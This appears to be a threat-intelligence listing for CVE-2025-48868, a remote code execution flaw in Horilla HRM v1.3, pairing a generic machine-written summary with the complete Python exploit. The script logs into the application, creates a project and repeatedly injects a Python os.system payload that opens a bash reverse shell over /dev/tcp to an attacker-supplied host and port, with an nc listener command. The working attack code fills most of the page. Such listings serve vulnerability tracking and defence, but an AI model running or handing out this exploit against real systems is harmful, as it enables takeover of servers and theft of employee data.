Horilla v1.3 - RCE
Horilla v1.3 - RCE
AI Analysis
Technical Summary
This threat concerns a remote code execution vulnerability in Horilla v1.3. The exploit allows an attacker to execute arbitrary code remotely. The exploit code is available in Python, facilitating potential exploitation. No detailed technical information or affected version specifics are provided. There is no vendor advisory or patch information available at this time.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to full system compromise. However, without further details or confirmed exploitation in the wild, the actual impact scope remains unconfirmed.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should monitor vendor communications and consider restricting access to vulnerable instances where possible.
Indicators of Compromise
- exploit-code: # Exploit Title: Horilla v1.3 - RCE # Date: 2025-05-29 # Exploit Author: Raghad Abdallah Al-syouf # Version: <= 1.3 # Tested on: Ubuntu / Docker # CVE: CVE-2025-48868 Description: This script exploits the authenticated RCE vulnerability CVE-2025-48868. It logs into the target web app, creates a project, and sends payloads to achieve a reverse shell connection to a listener **started manually** by the user. Usage: python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT Example: python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444 """ import requests import time import sys import argparse from bs4 import BeautifulSoup import urllib3 import random import string from datetime import datetime urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generate_random_title(): letters = ''.join(random.choices(string.ascii_lowercase, k=4)) digits = ''.join(random.choices(string.digits, k=2)) return letters + digits def main(): print("[+] CVE-2025-48868") parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan') parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000') parser.add_argument('--user', required=True, help='Username for login') parser.add_argument('--pass', required=True, dest='password', help='Password for login') parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)') parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)') args = parser.parse_args() base_url = args.url.rstrip('/') login_url = f"{base_url}/login/" project_url = f"{base_url}/project/project-bulk-archive" session = requests.Session() headers = { "User-Agent": "Mozilla/5.0", "X-Requested-With": "XMLHttpRequest" } print("[+] Getting login page...") login_page = session.get(login_url, headers=headers, verify=False) if login_page.status_code != 200: print(f"[-] Failed to load login page, status {login_page.status_code}") sys.exit(1) soup = BeautifulSoup(login_page.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] login_data = { "username": args.user, "password": args.password, "csrfmiddlewaretoken": csrf_token } print("[+] Logging in...") login_resp = session.post(login_url, data=login_data, headers=headers, verify=False) if login_resp.status_code != 200 or "logout" not in login_resp.text.lower(): print("[-] Login failed") sys.exit(1) print("[+] Logged in successfully!") project_view_url = f"{base_url}/project/project-view/" project_view = session.get(project_view_url, headers=headers, verify=False) soup = BeautifulSoup(project_view.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] print("[+] Creating project...") create_project_url = f"{base_url}/project/create-project?" today_str = datetime.now().strftime("%Y-%m-%d") random_title = generate_random_title() multipart_data = { "is_active": "on", "title": random_title, "managers": "1", "members": "1", "status": "new", "start_date": today_str, "end_date": today_str, "description": "Exploit project" } create_headers = { "User-Agent": "Mozilla/5.0", "Accept": "*/*", "Referer": project_view_url, "HX-Request": "true", "HX-Trigger": "hlvd701Form", "HX-Target": "hlvd701Form", "HX-Current-URL": project_view_url, "X-CSRFToken": csrf_token, "Origin": base_url, "DNT": "1", "Connection": "keep-alive", } create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False) if create_resp.status_code == 200: print(f"[+] Project created successfully with title: {random_title}") else: print(f"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...") headers["Referer"] = project_view_url headers["Origin"] = base_url headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" print("[*] Ensure your listener is running: `nc -lvnp {}`".format(args.lport)) print("[+] Sending payload...") i = 1 while True: encoded_ids = f"%5B%22{i}%22%5D" payload = f"__import__('os').system('bash+-c+\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\"')" exploit_url = f"{project_url}?is_active={payload}" data = f"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}" response = session.post(exploit_url, headers=headers, data=data, verify=False) if response.status_code == 200: print(f"[+] Payload sent for project id {i}. Waiting for shell...") else: print(f"[-] Error sending payload for project id {i} (status {response.status_code})") time.sleep(3) i += 1 if __name__ == "__main__": main()
Horilla v1.3 - RCE
Description
Horilla v1.3 - RCE
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat concerns a remote code execution vulnerability in Horilla v1.3. The exploit allows an attacker to execute arbitrary code remotely. The exploit code is available in Python, facilitating potential exploitation. No detailed technical information or affected version specifics are provided. There is no vendor advisory or patch information available at this time.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system, potentially leading to full system compromise. However, without further details or confirmed exploitation in the wild, the actual impact scope remains unconfirmed.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should monitor vendor communications and consider restricting access to vulnerable instances where possible.
Technical Details
- Edb Id
- 52497
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Horilla v1.3 - RCE
# Exploit Title: Horilla v1.3 - RCE # Date: 2025-05-29 # Exploit Author: Raghad Abdallah Al-syouf # Version: <= 1.3 # Tested on: Ubuntu / Docker # CVE: CVE-2025-48868 Description: This script exploits the authenticated RCE vulnerability CVE-2025-48868. It logs into the target web app, creates a project, and sends payloads to achieve a reverse shell connection to a listener **started manually** by the user. Usage: python3 CVE_2025_48868.py --url http[s]://target:port --user username --pas... (4874 more characters)
Threat ID: 69d842c21cc7ad14da3f5b38
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/17/2026, 2:43:56 PM
Last updated: 5/25/2026, 12:20:02 PM
Views: 92
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.